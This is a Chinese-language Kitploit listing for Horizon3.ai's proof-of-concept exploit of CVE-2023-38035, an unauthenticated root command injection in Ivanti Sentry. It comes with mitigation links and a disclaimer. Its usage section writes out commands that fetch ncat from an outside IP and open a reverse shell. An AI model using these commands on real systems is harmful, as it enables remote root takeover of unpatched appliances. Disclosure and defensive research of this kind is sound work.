Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-38035 — CVE-2023-38035 的概念验证漏洞利用程序,该漏洞是 Ivanti Sentry 中的一个未经验证的命令注入漏洞,可导致任意 root 命令执行,并可通过 ncat 获得反向 Shell。 | Kitploit
工具/GitHubGitHub/horizon3ai/cve-2023-38035
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubhorizon3ai/cve-2023-38035

CVE-2023-38035

CVE-2023-38035 的概念验证漏洞利用程序,该漏洞是 Ivanti Sentry 中的一个未经验证的命令注入漏洞,可导致任意 root 命令执行,并可通过 ncat 获得反向 Shell。

查看仓库
411233年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-38035

影响 Ivanti Sentry 的 CVE-2023-38035 POC

技术分析

关于该漏洞的技术根本原因分析可参阅我们的博客: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive

概述

该 POC 利用一个未经验证的命令注入漏洞,以 root 用户身份执行任意命令。

执行环境不允许使用命令管道,且系统未自带易于滥用的二进制文件,因此可以通过串联命令,从类似 https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat 的位置下载静态 ncat。

使用方法

root@kitploit:~
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Shell

缓解措施

请按照 Ivanti 安全公告中的说明更新至最新版本

  • https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US

在 Twitter 上关注 Horizon3.ai Attack Team 以获取最新安全研究:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免责声明

本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除明确授权的情况外,不应用于攻击系统。项目维护者不对软件的滥用负责。请负责任地使用。

下载工具